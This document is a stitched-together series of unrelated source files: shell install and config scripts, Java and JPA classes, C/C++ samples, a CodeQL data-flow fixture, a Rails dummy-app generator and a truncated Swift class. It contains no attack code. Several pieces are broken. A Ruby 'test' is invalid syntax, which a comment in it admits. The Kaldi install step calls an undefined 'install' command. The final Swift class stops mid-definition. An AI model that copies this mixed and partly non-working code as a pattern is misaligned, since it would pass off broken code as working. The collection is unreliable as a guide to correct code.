	// errors.New is the idiomatic choice when there are no format verbs
	// (fmt.Errorf with a constant string is flagged by staticcheck).
	return errors.New("incorrect usage")
}
|
const cron = require('node-cron');
const APICatalogService = require('../app/services/api-catalog.service');
/**
# ┌────────────── second
# │ ┌──────────── minute
# │ │ ┌────────── hour
# │ │ │ ┌──────── day of month
# │ │ │ │ ┌────── month
# │ │ │ │ │ ┌──── day of week
# │ │ │ │ │ │
# │ │ │ │ │ │
# * * * * * *
*/
const HOURLY_CRON_TAB = '0 * * * *';
module.exports = () => {
cron.schedule(HOURLY_CRON_TAB, () => {
console.log('Hourly Cron Started');
console.log('API Catalog Cron Job triggered!');
APICatalogService.writeApiEntries()
.then(() => console.log('API Catalog Cron Job successfully finished.'))
.catch(() => console.log('An error occurred during the API Catalog Cron Job.'));
});
};
|
#! /bin/bash
# Interactively collect security-profile credentials, append them as Python
# assignments to creds.py, then launch the auth web helper and print its URL.
echo "Enter your ProductID:"
read productid
echo ProductID = \"$productid\" >> creds.py
echo "Enter your Security Profile Description:"
read spd
echo Security_Profile_Description = \"$spd\" >> creds.py
echo "Enter your Security Profile ID:"
read spid
echo Security_Profile_ID = \"$spid\" >> creds.py
echo "Enter your Security Client ID:"
read cid
echo Client_ID = \"$cid\" >> creds.py
echo "Enter your Security Client Secret:"
read secret
echo Client_Secret = \"$secret\" >> creds.py
# Fix: the original wrote `ip = \`...\``, which bash parses as running a
# command named "ip" — a variable assignment must have no spaces around "=".
ip=$(ifconfig eth0 | grep "inet addr" | cut -d ':' -f 2 | cut -d ' ' -f 1)
python ./auth_web.py
echo "Open http://$ip:5000"
|
package com.sopra.bbl.msa.event.dto;
import com.sopra.bbl.msa.event.domain.Event;
import com.sopra.bbl.msa.event.domain.EventType;
import org.apache.commons.lang3.builder.ToStringBuilder;
import java.time.LocalDate;
import java.time.temporal.ChronoUnit;
/**
* DTO représentant l'enregistrement à un événement
*
* @author jntakpe
*/
public class EventRegistrationDTO {
    /** Recipient address of the registration notification. */
    private String to;
    private String name;
    private EventType type;
    private LocalDate start;
    private Integer duration;
    private ChronoUnit durationUnit;
    public EventRegistrationDTO() {
    }
    /**
     * Builds the DTO by copying the event's details and attaching the
     * recipient address.
     *
     * @param event event whose name, type, start and duration are copied
     * @param to    recipient address
     */
    public EventRegistrationDTO(Event event, String to) {
        setName(event.getName());
        setType(event.getType());
        setStart(event.getStart());
        setDuration(event.getDuration());
        setDurationUnit(event.getDurationUnit());
        setTo(to);
    }
    public String getTo() {
        return to;
    }
    public void setTo(String to) {
        this.to = to;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public EventType getType() {
        return type;
    }
    public void setType(EventType type) {
        this.type = type;
    }
    public LocalDate getStart() {
        return start;
    }
    // Fixed typo: the parameter was previously named "strart".
    public void setStart(LocalDate start) {
        this.start = start;
    }
    public Integer getDuration() {
        return duration;
    }
    public void setDuration(Integer duration) {
        this.duration = duration;
    }
    public ChronoUnit getDurationUnit() {
        return durationUnit;
    }
    public void setDurationUnit(ChronoUnit durationUnit) {
        this.durationUnit = durationUnit;
    }
    @Override
    public String toString() {
        return new ToStringBuilder(this)
                .append("to", to)
                .append("name", name)
                .append("type", type)
                // Fixed typo: the label was previously "strart".
                .append("start", start)
                .append("duration", duration)
                .append("durationUnit", durationUnit)
                .toString();
    }
}
|
<filename>calculator.rb<gh_stars>0
# NOTE(review): this block is not valid Ruby — `def ./calculator.rb` is a
# syntax error, and the expectation lines below do not follow RSpec's API
# (e.g. `expect(sum).x+y(5)` is not a matcher call). Preserved verbatim;
# it needs to be rewritten as a proper RSpec file before it can run.
def ./calculator.rb
it"contains a local variable called first_number that is assigned to a number"
do
expect(first_number).equal_to(x)
x=2
expect(second_number).not_to equal(y)
y=3
expect(sum).x+y(5)
expect(sum).5-y(x)
expect(sum).x*1(x)
expect(sum).6/x(y)
# code for test is an integer
end
|
#!/usr/bin/env bash
# For all ".in" files, use `sed` to find and replace (with backup)
# all instances of "{comp_status}" with "Enabled".
all=$(find ~/projects/mdpiper/component_metadata -iname "*.in")
for file in $all; do
    # -i.foo edits in place, keeping a backup copy with a ".foo" suffix.
    # NOTE(review): the replacement text carries a trailing space after
    # "Enabled" — preserved as-is; confirm whether it is intentional.
    # Quoting "$file" protects paths containing whitespace.
    sed -i.foo 's@{comp_status}@Enabled @' "$file"
done
exit 0
|
package com.example.administrator.mobilesafe;
import android.content.Intent;
import android.database.DataSetObserver;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.BaseAdapter;
import android.widget.GridView;
import android.widget.ImageView;
import android.widget.ListAdapter;
import android.widget.TextView;
/**
 * Home screen: a 3x3 grid of feature entries. Only the last cell (settings)
 * is wired to an activity; the other cells are placeholders.
 */
public class HomeActivity extends AppCompatActivity {
    /** Grid that displays the nine feature entries. */
    private GridView gv_home_items;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_home);
        // Bind the grid, attach the adapter and route cell taps.
        gv_home_items = (GridView) findViewById(R.id.gv_home_items);
        gv_home_items.setAdapter(new HomeItemsAdapter());
        gv_home_items.setOnItemClickListener(new AdapterView.OnItemClickListener() {
            @Override
            public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
                // Last cell (index 8) opens the settings screen.
                if (position == 8) {
                    Intent intent = new Intent();
                    intent.setClass(getApplicationContext(), SettingsActivity.class);
                    startActivity(intent);
                }
            }
        });
    }
    // Labels and icons for the nine cells (parallel arrays, same order).
    String[] itemNames = new String[]{"手机防盗","通讯卫士","软件管理","进程管理","流量统计","手机杀毒","缓存清理",
            "高级工具","设置中心"};
    int[] imageNames = new int[]{R.drawable.safe,R.drawable.callmsgsafe,R.drawable.app,R.drawable.taskmanager,
            R.drawable.netmanager,R.drawable.trojan,R.drawable.sysoptimize,R.drawable.atools,R.drawable.settings};
    /** Adapter that renders one icon + label cell per feature entry. */
    private class HomeItemsAdapter extends BaseAdapter {
        @Override
        public int getCount() {
            // Derive the count from the data instead of hard-coding 9.
            return itemNames.length;
        }
        @Override
        public Object getItem(int position) {
            return null;
        }
        @Override
        public long getItemId(int position) {
            return 0;
        }
        @Override
        public View getView(int position, View convertView, ViewGroup parent) {
            // Fix: reuse the recycled view when available instead of
            // inflating a fresh layout on every call.
            View view = convertView;
            if (view == null) {
                view = View.inflate(getApplicationContext(), R.layout.item_home, null);
            }
            ImageView imageView = (ImageView) view.findViewById(R.id.iv_home_item);
            imageView.setImageResource(imageNames[position]);
            TextView textView = (TextView) view.findViewById(R.id.tv_home_item);
            textView.setText(itemNames[position]);
            return view;
        }
        @Override
        public int getItemViewType(int position) {
            return 0;
        }
    }
}
|
<reponame>get-bundled/axyz-sdk<filename>packages/axyz-react/src/components/ModalConnect/index.ts
// Re-export the folder's ModalConnect component as its default export.
export { default } from './ModalConnect';
|
# Copyright 2011 The Apache Software Foundation
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Set Hadoop-specific environment variables here.
# The only required environment variable is JAVA_HOME. All others are
# optional. When running a distributed configuration it is best to
# set JAVA_HOME in this file, so that it is correctly defined on
# remote nodes.
# The java implementation to use.
export JAVA_HOME=${JAVA_HOME}
#export JAVA_HOME=$(readlink -f /usr/bin/java | sed "s:bin/java::")
# The jsvc implementation to use. Jsvc is required to run secure datanodes.
#export JSVC_HOME=${JSVC_HOME}
export HADOOP_CONF_DIR=${HADOOP_CONF_DIR:-"/etc/hadoop"}
# Extra Java CLASSPATH elements. Automatically insert capacity-scheduler.
# Appends every capacity-scheduler jar; the first jar found seeds the
# variable when HADOOP_CLASSPATH is initially empty.
for f in $HADOOP_HOME/contrib/capacity-scheduler/*.jar; do
  if [ "$HADOOP_CLASSPATH" ]; then
    export HADOOP_CLASSPATH=$HADOOP_CLASSPATH:$f
  else
    export HADOOP_CLASSPATH=$f
  fi
done
# The maximum amount of heap to use, in MB. Default is 1000.
#export HADOOP_HEAPSIZE=
#export HADOOP_NAMENODE_INIT_HEAPSIZE=""
# Extra Java runtime options. Empty by default.
export HADOOP_OPTS="$HADOOP_OPTS -Djava.net.preferIPv4Stack=true"
# Command specific options appended to HADOOP_OPTS when specified
export HADOOP_NAMENODE_OPTS="-Dhadoop.security.logger=${HADOOP_SECURITY_LOGGER:-INFO,RFAS} -Dhdfs.audit.logger=${HDFS_AUDIT_LOGGER:-INFO,NullAppender} $HADOOP_NAMENODE_OPTS"
export HADOOP_DATANODE_OPTS="-Dhadoop.security.logger=ERROR,RFAS $HADOOP_DATANODE_OPTS"
export HADOOP_SECONDARYNAMENODE_OPTS="-Dhadoop.security.logger=${HADOOP_SECURITY_LOGGER:-INFO,RFAS} -Dhdfs.audit.logger=${HDFS_AUDIT_LOGGER:-INFO,NullAppender} $HADOOP_SECONDARYNAMENODE_OPTS"
# The following applies to multiple commands (fs, dfs, fsck, distcp etc)
export HADOOP_CLIENT_OPTS="-Xmx512m $HADOOP_CLIENT_OPTS"
#HADOOP_JAVA_PLATFORM_OPTS="-XX:-UsePerfData $HADOOP_JAVA_PLATFORM_OPTS"
# On secure datanodes, user to run the datanode as after dropping privileges
export HADOOP_SECURE_DN_USER=${HADOOP_SECURE_DN_USER}
# Where log files are stored. $HADOOP_HOME/logs by default.
#export HADOOP_LOG_DIR=${HADOOP_LOG_DIR}/$USER
# Where log files are stored in the secure data environment.
export HADOOP_SECURE_DN_LOG_DIR=${HADOOP_LOG_DIR}/${HADOOP_HDFS_USER}
# The directory where pid files are stored. /tmp by default.
# NOTE: this should be set to a directory that can only be written to by
# the user that will run the hadoop daemons. Otherwise there is the
# potential for a symlink attack.
export HADOOP_PID_DIR=${HADOOP_PID_DIR}
export HADOOP_SECURE_DN_PID_DIR=${HADOOP_PID_DIR}
# A string representing this instance of hadoop. $USER by default.
export HADOOP_IDENT_STRING=$USER
|
class Employee:
    """Simple record of an employee's name, age and salary."""

    def __init__(self, name, age, salary):
        # Store the three attributes verbatim, exactly as supplied.
        self.name, self.age, self.salary = name, age, salary


# Two sample employee records.
employeeA = Employee('John Doe', 35, 5000)
employeeB = Employee('Jane Smith', 28, 6000)
/* (C) Copyright <NAME>, 2002.
** Distributed under the Boost Software License, Version 1.0.
** (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
*/
#include <cstdio>
int main(int /* argc */, char ** /* argv */)
{
    // Print the 2-times table for 0 through 15, one line per product.
    int i = 0;
    while (i < 16)
    {
        std::printf("%d * 2 = %d\n", i, i * 2);
        ++i;
    }
    return 0;
}
|
#include <stdio.h>
/*
 * Partition arr in place so that all even elements precede all odd
 * elements. The relative order within each group is NOT preserved.
 *
 * arr:  array to partition
 * size: number of elements in arr (size <= 0 leaves arr untouched)
 */
void segregateEvenOdd(int arr[], int size)
{
    int left = 0, right = size - 1;
    while (left < right)
    {
        /* Advance past the leading even run (bound checked before the
           element is read, unlike the original condition order). */
        while (left < right && arr[left] % 2 == 0)
            left++;
        /* Retreat past the trailing odd run. */
        while (left < right && arr[right] % 2 == 1)
            right--;
        if (left < right)
        {
            /* Plain temporary swap: clearer than the previous XOR-swap
               trick, which silently zeroes the element if the two
               indices ever alias. */
            int tmp = arr[left];
            arr[left] = arr[right];
            arr[right] = tmp;
            left++;
            right--;
        }
    }
}
// Driver program to test above functions
/* Driver: segregates a sample array and prints it on a single line. */
int main()
{
    int values[] = {2, 4, 5, 6, 8, 10};
    int count = sizeof(values) / sizeof(values[0]);
    segregateEvenOdd(values, count);
    /* Header and first element together, then the remaining elements
       space-separated (no trailing newline, matching the original). */
    printf("Modified array with all even elements first: %d", values[0]);
    int i = 1;
    while (i < count)
    {
        printf(" %d", values[i]);
        ++i;
    }
    return 0;
}
#!/bin/sh
# Emit candidate image-tag strings for a vscode image, combining the
# installed code/node/npm/yarn versions with the Ubuntu release, ordered
# from most to least specific.
set -eu
# Pull VERSION_ID (the Ubuntu release number) into the environment.
. /etc/os-release
APP=vscode
# Debian package version of VS Code, with the trailing "-<build>" stripped.
APP_VERSION="$(dpkg -s code | sed -n 's|^Version: \([^-]\+\).*|\1|p')"
# node prints "vX.Y.Z"; drop the leading "v".
NODE_VERSION="$(node --version | sed -e 's/^v//')"
NPM_VERSION="$(npm info npm version)"
# NOTE(review): single-dash "-version" — "--version" is the documented
# spelling; confirm before changing.
YARN_VERSION="$(yarn -version)"
# major.minor (and major-only) forms used in the shorter tags below.
NODE_V2=$(echo "$NODE_VERSION" | cut -d. -f1-2)
YARN_V2=$(echo "$YARN_VERSION" | cut -d. -f1-2)
NPM_V2=$(echo "$NPM_VERSION" | cut -d. -f1-2)
NPM_V1=$(echo "$NPM_VERSION" | cut -d. -f1)
# First line uses the full node version; subsequent lines progressively
# shorten or drop components.
echo "$APP$APP_VERSION-node$NODE_VERSION-npm$NPM_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-yarn$YARN_V2"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V2"
echo "$APP$APP_VERSION-node$NODE_V2-npm$NPM_V1"
echo "$APP$APP_VERSION-node$NODE_V2-yarn$YARN_V2-ubuntu$VERSION_ID"
echo "$APP$APP_VERSION-node$NODE_V2-yarn$YARN_V2"
|
#!/usr/bin/env bash
this_dir="$( cd "$( dirname "$0" )" && pwd )"
CPU_ARCH="$(uname --m)"
# -----------------------------------------------------------------------------
# Command-line Arguments
# -----------------------------------------------------------------------------
. "${this_dir}/etc/shflags"
DEFINE_string 'venv' "${this_dir}/.venv" 'Path to create virtual environment'
DEFINE_string 'download-dir' "${this_dir}/download" 'Directory to cache downloaded files'
DEFINE_string 'build-dir' "${this_dir}/build_${CPU_ARCH}" 'Directory to build dependencies in'
DEFINE_boolean 'system' true 'Install system dependencies'
DEFINE_boolean 'flair' false 'Install flair'
DEFINE_boolean 'precise' false 'Install Mycroft Precise'
DEFINE_boolean 'adapt' false 'Install Mycroft Adapt'
DEFINE_boolean 'google' false 'Install Google Text to Speech'
DEFINE_boolean 'kaldi' false 'Install Kaldi'
DEFINE_boolean 'offline' false "Don't download anything"
DEFINE_boolean 'web' true "Build Vue web interface with yarn"
DEFINE_boolean 'sudo' true "Use sudo for apt"
DEFINE_integer 'make-threads' 4 'Number of threads to use with make' 'j'
DEFINE_string 'python' 'python3' 'Path to Python executable'
FLAGS "$@" || exit $?
eval set -- "${FLAGS_ARGV}"
# -----------------------------------------------------------------------------
# Default Settings
# -----------------------------------------------------------------------------
set -e
python="${FLAGS_python}"
venv="${FLAGS_venv}"
download_dir="${FLAGS_download_dir}"
mkdir -p "${download_dir}"
echo "Download directory: ${download_dir}"
build_dir="${FLAGS_build_dir}"
mkdir -p "${build_dir}"
echo "Build directory: ${build_dir}"
if [[ "${FLAGS_system}" -eq "${FLAGS_FALSE}" ]]; then
no_system='true'
fi
if [[ "${FLAGS_flair}" -eq "${FLAGS_FALSE}" ]]; then
no_flair='true'
fi
if [[ "${FLAGS_precise}" -eq "${FLAGS_FALSE}" ]]; then
no_precise='true'
fi
if [[ "${FLAGS_adapt}" -eq "${FLAGS_FALSE}" ]]; then
no_adapt='true'
fi
if [[ "${FLAGS_kaldi}" -eq "${FLAGS_FALSE}" ]]; then
no_kaldi='true'
fi
if [[ "${FLAGS_google}" -eq "${FLAGS_FALSE}" ]]; then
no_google='true'
fi
if [[ "${FLAGS_offline}" -eq "${FLAGS_TRUE}" ]]; then
offline='true'
fi
if [[ "${FLAGS_web}" -eq "${FLAGS_FALSE}" ]]; then
no_web='true'
fi
if [[ "${FLAGS_sudo}" -eq "${FLAGS_TRUE}" ]]; then
function run_sudo {
sudo "$@"
}
else
function run_sudo {
"$@"
}
fi
make_threads="${FLAGS_make_threads}"
# -----------------------------------------------------------------------------
# Create a temporary directory for building stuff
temp_dir="$(mktemp -d)"
function cleanup {
rm -rf "${temp_dir}"
}
trap cleanup EXIT
function maybe_download {
if [[ ! -s "$2" ]]; then
if [[ -n "${offline}" ]]; then
echo "Need to download $1 but offline."
exit 1
fi
mkdir -p "$(dirname "$2")"
curl -sSfL -o "$2" "$1" || { echo "Can't download $1"; exit 1; }
echo "$1 => $2"
fi
}
# -----------------------------------------------------------------------------
echo "Checking required programs"
if [[ -z "${no_web}" ]]; then
if [[ ! -n "$(command -v yarn)" ]]; then
echo "Please install yarn to continue (https://yarnpkg.com)"
exit 1
fi
fi
# -----------------------------------------------------------------------------
if [[ -z "${no_system}" ]]; then
echo "Installing system dependencies"
run_sudo apt-get update
run_sudo apt-get install --no-install-recommends \
python3 python3-pip python3-venv python3-dev \
python \
build-essential autoconf autoconf-archive libtool automake bison \
sox espeak flite swig portaudio19-dev \
libatlas-base-dev \
gfortran \
sphinxbase-utils sphinxtrain pocketsphinx \
jq checkinstall unzip xz-utils \
curl \
lame
fi
# -----------------------------------------------------------------------------
echo "Downloading dependencies"
# Python-Pocketsphinx
pocketsphinx_file="${download_dir}/pocketsphinx-python.tar.gz"
if [[ ! -s "${pocketsphinx_file}" ]]; then
pocketsphinx_url='https://github.com/synesthesiam/pocketsphinx-python/releases/download/v1.0/pocketsphinx-python.tar.gz'
echo "Downloading pocketsphinx (${pocketsphinx_url})"
maybe_download "${pocketsphinx_url}" "${pocketsphinx_file}"
fi
# OpenFST
openfst_dir="${build_dir}/openfst-1.6.9"
if [[ ! -d "${openfst_dir}/build" ]]; then
openfst_file="${download_dir}/openfst-1.6.9.tar.gz"
if [[ ! -s "${openfst_file}" ]]; then
openfst_url='http://openfst.org/twiki/pub/FST/FstDownload/openfst-1.6.9.tar.gz'
echo "Downloading openfst (${openfst_url})"
maybe_download "${openfst_url}" "${openfst_file}"
fi
fi
# Opengrm
opengrm_dir="${build_dir}/opengrm-ngram-1.3.4"
if [[ ! -d "${opengrm_dir}/build" ]]; then
opengrm_file="${download_dir}/opengrm-ngram-1.3.4.tar.gz"
if [[ ! -s "${opengrm_file}" ]]; then
opengrm_url='http://www.opengrm.org/twiki/pub/GRM/NGramDownload/opengrm-ngram-1.3.4.tar.gz'
echo "Downloading opengrm (${opengrm_url})"
maybe_download "${opengrm_url}" "${opengrm_file}"
fi
fi
# Phonetisaurus
phonetisaurus_dir="${build_dir}/phonetisaurus"
if [[ ! -d "${phonetisaurus_dir}/build" ]]; then
phonetisaurus_file="${download_dir}/phonetisaurus-2019.tar.gz"
if [[ ! -s "${phonetisaurus_file}" ]]; then
phonetisaurus_url='https://github.com/synesthesiam/docker-phonetisaurus/raw/master/download/phonetisaurus-2019.tar.gz'
echo "Downloading phonetisaurus (${phonetisaurus_url})"
maybe_download "${phonetisaurus_url}" "${phonetisaurus_file}"
fi
fi
# Kaldi
kaldi_dir="${this_dir}/opt/kaldi"
if [[ -z "${no_kaldi}" && ! -d "${kaldi_dir}" ]]; then
install libatlas-base-dev libatlas3-base gfortran
run_sudo ldconfig
kaldi_file="${download_dir}/kaldi-2019.tar.gz"
if [[ ! -s "${kaldi_file}" ]]; then
kaldi_url='https://github.com/kaldi-asr/kaldi/archive/master.tar.gz'
echo "Downloading kaldi (${kaldi_url})"
maybe_download "${kaldi_url}" "${kaldi_file}"
fi
fi
# -----------------------------------------------------------------------------
# Re-create virtual environment
echo "Creating virtual environment"
rm -rf "${venv}"
"${python}" -m venv "${venv}"
source "${venv}/bin/activate"
pip3 install wheel setuptools
# -----------------------------------------------------------------------------
# openfst
# http://www.openfst.org
#
# Required to build languag models and do intent recognition.
# -----------------------------------------------------------------------------
if [[ ! -d "${openfst_dir}/build" ]]; then
echo "Building openfst (${openfst_file})"
tar -C "${build_dir}" -xf "${openfst_file}" && \
cd "${openfst_dir}" && \
./configure "--prefix=${openfst_dir}/build" \
--enable-far \
--disable-static \
--enable-shared \
--enable-ngram-fsts && \
make -j "${make_threads}" && \
make install
fi
# Copy build artifacts into virtual environment
cp -R "${openfst_dir}"/build/include/* "${venv}/include/"
cp -R "${openfst_dir}"/build/lib/*.so* "${venv}/lib/"
cp -R "${openfst_dir}"/build/bin/* "${venv}/bin/"
# -----------------------------------------------------------------------------
# opengrm
# http://www.opengrm.org/twiki/bin/view/GRM/NGramLibrary
#
# Required to build language models.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# opengrm
#
# Built from a source tarball against the openfst headers/libraries that were
# previously installed into the virtual environment (${venv}).
# -----------------------------------------------------------------------------
if [[ ! -d "${opengrm_dir}/build" ]]; then
    echo "Building opengrm (${opengrm_file})"
    # Point the build at the venv's openfst installation.
    export CXXFLAGS="-I${venv}/include"
    export LDFLAGS="-L${venv}/lib"
    tar -C "${build_dir}" -xf "${opengrm_file}" && \
        cd "${opengrm_dir}" && \
        ./configure "--prefix=${opengrm_dir}/build" && \
        make -j "${make_threads}" && \
        make install
fi

# Copy build artifacts into virtual environment
cp -R "${opengrm_dir}"/build/bin/* "${venv}/bin/"
cp -R "${opengrm_dir}"/build/include/* "${venv}/include/"
cp -R "${opengrm_dir}"/build/lib/*.so* "${venv}/lib/"

# -----------------------------------------------------------------------------
# phonetisaurus
# https://github.com/AdolfVonKleist/Phonetisaurus
#
# Required to guess word pronunciations.
# -----------------------------------------------------------------------------
if [[ ! -d "${phonetisaurus_dir}/build" ]]; then
    echo "Installing phonetisaurus (${phonetisaurus_file})"
    tar -C "${build_dir}" -xf "${phonetisaurus_file}" && \
        cd "${phonetisaurus_dir}" && \
        ./configure "--prefix=${phonetisaurus_dir}/build" \
                    --with-openfst-includes="${venv}/include" \
                    --with-openfst-libs="${venv}/lib" && \
        make -j "${make_threads}" && \
        make install
fi

# Copy build artifacts into virtual environment
cp -R "${phonetisaurus_dir}"/build/bin/* "${venv}/bin/"

# -----------------------------------------------------------------------------
# kaldi
# https://kaldi-asr.org
#
# Required for speech recognition with Kaldi-based profiles.
# Skipped entirely when ${no_kaldi} is set; otherwise the presence of one of
# the final binaries is used as the "already built" marker.
# -----------------------------------------------------------------------------
if [[ -z "${no_kaldi}" && ! -f "${kaldi_dir}/src/online2bin/online2-wav-nnet3-latgen-faster" ]]; then
    echo "Installing kaldi (${kaldi_file})"
    # armhf
    if [[ -f '/usr/lib/arm-linux-gnueabihf/libatlas.so' ]]; then
        # Kaldi install doesn't check here, despite in being in ldconfig
        export ATLASLIBDIR='/usr/lib/arm-linux-gnueabihf'
    fi
    # aarch64
    if [[ -f '/usr/lib/aarch64-linux-gnu/libatlas.so' ]]; then
        # Kaldi install doesn't check here, despite in being in ldconfig
        export ATLASLIBDIR='/usr/lib/aarch64-linux-gnu'
    fi
    # Provide the aarch64 ATLAS makefile, then build tools and the CPU-only
    # ATLAS-backed compiler sources.
    tar -C "${build_dir}" -xf "${kaldi_file}" && \
        cp "${this_dir}/etc/linux_atlas_aarch64.mk" "${kaldi_dir}/src/makefiles/" && \
        cd "${kaldi_dir}/tools" && \
        make -j "${make_threads}" && \
        cd "${kaldi_dir}/src" && \
        ./configure --shared --mathlib=ATLAS --use-cuda=no && \
        make depend -j "${make_threads}" && \
        make -j "${make_threads}"
fi

# -----------------------------------------------------------------------------
# Python requirements
# -----------------------------------------------------------------------------
echo "Installing Python requirements"
"${python}" -m pip install requests

# pytorch is not available on ARM
case "${CPU_ARCH}" in
    armv7l|arm64v8)
        no_flair="true" ;;
esac

# Work on a scratch copy of requirements.txt so exclusions below do not touch
# the checked-in file.
requirements_file="${temp_dir}/requirements.txt"
temp_requirements_file="${temp_dir}/temp_requirements.txt"
cp "${this_dir}/requirements.txt" "${requirements_file}"

# Exclude requirements
if [[ -n "${no_flair}" ]]; then
    echo "Excluding flair from virtual environment"
    sed '/^flair/d' "${requirements_file}" > "${temp_requirements_file}" &&
        mv "${temp_requirements_file}" "${requirements_file}"
fi

if [[ -n "${no_precise}" ]]; then
    echo "Excluding Mycroft Precise from virtual environment"
    sed '/^precise-runner/d' "${requirements_file}" > "${temp_requirements_file}" &&
        mv "${temp_requirements_file}" "${requirements_file}"
fi

if [[ -n "${no_adapt}" ]]; then
    echo "Excluding Mycroft Adapt from virtual environment"
    sed '/^adapt-parser/d' "${requirements_file}" > "${temp_requirements_file}" &&
        mv "${temp_requirements_file}" "${requirements_file}"
fi

if [[ -n "${no_google}" ]]; then
    echo "Excluding Google Text to Speech from virtual environment"
    sed '/^google-cloud-texttospeech/d' "${requirements_file}" > "${temp_requirements_file}" &&
        mv "${temp_requirements_file}" "${requirements_file}"
fi

# Install everything except openfst first
sed '/^openfst/d' "${requirements_file}" > "${temp_requirements_file}" &&
    mv "${temp_requirements_file}" "${requirements_file}"
"${python}" -m pip install -r "${requirements_file}"

# The openfst Python wrapper needs the C++ headers/libs installed in the venv,
# hence the build_ext include/lib overrides.
echo "Installing Python openfst wrapper"
"${python}" -m pip install \
    --global-option=build_ext \
    --global-option="-I${venv}/include" \
    --global-option="-L${venv}/lib" \
    -r <(grep '^openfst' "${this_dir}/requirements.txt")

# -----------------------------------------------------------------------------
# Pocketsphinx for Python
# https://github.com/cmusphinx/pocketsphinx
#
# Speech to text for most profiles.
# -----------------------------------------------------------------------------
pocketsphinx_file="${download_dir}/pocketsphinx-python.tar.gz"
echo "Installing Python pocketsphinx (${pocketsphinx_file})"
"${python}" -m pip install "${pocketsphinx_file}"

# -----------------------------------------------------------------------------
# Snowboy
# https://snowboy.kitt.ai
#
# Wake word system; only published for x86_64 and armv7l.
# -----------------------------------------------------------------------------
case "${CPU_ARCH}" in
    x86_64|armv7l)
        snowboy_file="${download_dir}/snowboy-1.3.0.tar.gz"
        echo "Installing snowboy (${snowboy_file})"
        "${python}" -m pip install "${snowboy_file}"
        ;;

    *)
        echo "Not installing snowboy (${CPU_ARCH} not supported)"
esac

# -----------------------------------------------------------------------------
# Web interface (yarn build), unless explicitly disabled.
# -----------------------------------------------------------------------------
if [[ -z "${no_web}" ]]; then
    echo "Building web interface"
    cd "${this_dir}" && yarn install && yarn build
fi
|
<reponame>vadi2/codeql
// Minimal data-flow test fixture: source() produces a value, sink() consumes
// one, and customStep()/through1() model intermediate flow steps.
// NOTE(review): this appears to be a CodeQL test case (repo "vadi2/codeql");
// the exact shape of the flow — including the cast inside through1 — is
// deliberate, so do not "simplify" it.
public class A {
    // Models a user-configured flow step; the analysis treats it as
    // value-preserving even though it returns null at runtime.
    Object customStep(Object o) { return null; }

    // Taint source.
    Object source() { return null; }

    // Taint sink; flow from source() should be reported here.
    void sink(Object o) { }

    // Forwards its argument through customStep plus a downcast.
    Object through1(Object o) {
        Object o2 = customStep(o);
        String s = (String)o2;
        return s;
    }

    void foo() {
        Object x = through1(source());
        sink(x);
    }
}
|
#!/bin/bash
# Regenerate the dummy Rails application used by the spec suite.

# Delete old dummy app
rm -rf spec/dummy

# Generate new dummy app (migrations are deferred; they run at the end)
DISABLE_MIGRATE=true bundle exec rake dummy:app

# Bail out if generation did not produce the expected config directory
if [ ! -d "spec/dummy/config" ]; then exit 1; fi

# Cleanup: the dummy app should inherit the repository's Ruby/Gemfile setup
rm spec/dummy/.ruby-version
rm spec/dummy/Gemfile
cd spec/dummy

# Use correct Gemfile (path is relative to spec/dummy/config/boot.rb)
sed -i "s|../Gemfile|../../../Gemfile|g" config/boot.rb

# I18n configuration
touch config/initializers/i18n.rb
echo "Rails.application.config.i18n.available_locales = [:en, :de]" >> config/initializers/i18n.rb
echo "Rails.application.config.i18n.default_locale = :de" >> config/initializers/i18n.rb

# I18n routing
touch config/initializers/route_translator.rb
echo "RouteTranslator.config do |config|" >> config/initializers/route_translator.rb
echo " config.force_locale = true" >> config/initializers/route_translator.rb
echo "end" >> config/initializers/route_translator.rb

# Turbolinks (inserted at line 15 of config/application.rb)
sed -i "15irequire 'turbolinks'" config/application.rb

# Satisfy prerequisites
sed -i "15irequire 'cmor_cms'" config/application.rb
rails generate simple_form:install --bootstrap
rails generate administrador:install
rails generate cmor:core:install
rails generate cmor:core:backend:install
rails generate cmor:cms:install
rails cmor_cms:install:migrations

# Install gem
rails generate cmor:legal:install

# prepare spec database
rails db:migrate db:test:prepare
|
<filename>app/models/Destination.java
package models;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
/**
 * JPA entity describing a travel destination: a database-generated id,
 * a display name and a free-text information field.
 */
@Entity
public class Destination {

    /** Primary key, generated by the database on insert. */
    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private int destinationId;

    /** Human-readable name of the destination. */
    private String destinationName;

    /** Free-text description of the destination. */
    private String destinationInformation;

    public int getDestinationId() {
        return destinationId;
    }

    public void setDestinationId(int destinationId) {
        this.destinationId = destinationId;
    }

    public String getDestinationName() {
        return destinationName;
    }

    public void setDestinationName(String destinationName) {
        this.destinationName = destinationName;
    }

    public String getDestinationInformation() {
        return destinationInformation;
    }

    public void setDestinationInformation(String destinationInformation) {
        this.destinationInformation = destinationInformation;
    }
}
|
/// Details of a scheduled show: its category, on/off-air times, play time
/// in minutes, title, and whether it is currently being shown.
class ShowDetails {
    var contextType: String
    var downTime: String
